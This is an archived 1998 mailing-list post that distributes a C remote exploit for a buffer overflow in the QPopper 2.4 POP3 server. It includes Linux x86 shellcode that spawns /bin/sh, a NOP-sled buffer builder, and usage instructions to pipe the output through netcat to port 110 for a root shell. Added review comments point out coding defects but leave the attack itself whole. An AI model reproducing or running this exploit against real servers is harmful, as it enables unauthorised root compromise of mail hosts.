QPopper Exploit

From: Here in my world I am God (warchildat_private)
Date: Mon Jun 29 1998 - 13:01:51 PDT


    This is a multi-part message in MIME format.
    --------------9CF769026596CED793CC0CC3
    Content-Type: text/plain; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    
    Here's an exploit for QPopper 2.4. Since the overflow is common to
    several versions, it should work on them too.
    You need netcat to make it work, and you'll get a root prompt when it
    does.
    
    Regards,
        [WaR]
    
    
    
    --------------9CF769026596CED793CC0CC3
    Content-Type: text/plain; charset=us-ascii; name="qpopper.c"
    Content-Transfer-Encoding: 7bit
    Content-Disposition: inline; filename="qpopper.c"
    
    /* Exploit for qpopper 2.4 (and others) for Linux
     *   by [WaR] (warchildat_private) and zav (zavat_private)
     *
     *  usage: (./qpopper <offset>;cat)|nc <victim> 110
     *       with offset around 1000 (try increments of 50)
     *
     *
     *    shout outs to: Zef and YZF
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    
    #define BUFFSIZE 998
    
    /* Payload: raw Linux/x86 machine code (note the `cd 80` int 0x80 bytes)
     * ending in the string "/bin/sh".  main() copies it into the tail of the
     * overflowing buffer; it is runtime data, so it is reproduced byte for
     * byte here and never edited.
     */
    char shell[] =
       "\xeb\x33\x5e\x89\x76\x08\x31\xc0"
       "\x88\x66\x07\x83\xee\x02\x31\xdb"
       "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
       "\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
       "\xee\x02\x8d\x5e\x0e\x89\xda\x83"
       "\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
       "\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
       "\xff\xff/bin/sh";
    
    /* Returns (approximately) the current stack pointer.
     *
     * There is no return statement: the value is left in %eax by the inline
     * asm and the caller relies on the x86 convention that %eax carries the
     * return value.  In standard C, reaching the end of a non-void function
     * and using its value is undefined behaviour, and the function is only
     * meaningful on 32-bit x86.  Left as in the original listing.
     */
    unsigned long esp()
    {
      __asm__(" movl %esp,%eax ");   /* result lives only in %eax */
    }
    
    /* Builds the oversized POP3 input described in the header comment and
     * writes it to stdout; the usage line above pipes that output into
     * netcat.  argv[1] is an offset (see usage) added to the stack pointer
     * read by esp().
     *
     * Review notes (defects visible in this listing, kept as the author
     * wrote them):
     *  - argc is never checked, so running with no argument passes
     *    argv[1] == NULL to atoi().
     *  - strlen() is called without #include <string.h>; that is an implicit
     *    declaration, removed from the language in C99 and a hard error in
     *    current compilers.
     *  - buffer[] is never NUL-terminated: indices 0..1008 are written, the
     *    rest of the 4096-byte array is uninitialised, and printf("%s")
     *    reads it until it happens to find a zero byte (undefined behaviour).
     *  - main() is declared with an implicit int return type and returns
     *    nothing.
     */
    main(int argc, char **argv)
    {
      int i,j,offset;
      unsigned long eip;
      char buffer[4096];              /* never NUL-terminated, see above */
    
      j=0;
      offset=atoi(argv[1]);           /* argv[1] unchecked: NULL if argc < 2 */
      eip=esp()+offset;               /* esp() has no return statement */
      for(i=0;i<1008;i++) buffer[i]=0x90;                                   /* 0x90 = x86 nop */
      for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++]; /* shell[] ends at index BUFFSIZE-1 */
    
      i=1005;
      /* eip stored little-endian in buffer[1005..1008]; index 1008 lies
       * past the nop fill, so it is the last byte ever written. */
      buffer[i]=eip & 0xff;
      buffer[i+1]=(eip >> 8) & 0xff;
      buffer[i+2]=(eip >> 16) & 0xff;
      buffer[i+3]=(eip >> 24) & 0xff;
    
      printf("%s\nsh -i\n",buffer);   /* %s reads past the written bytes */
    }
    
    --------------9CF769026596CED793CC0CC3--
    


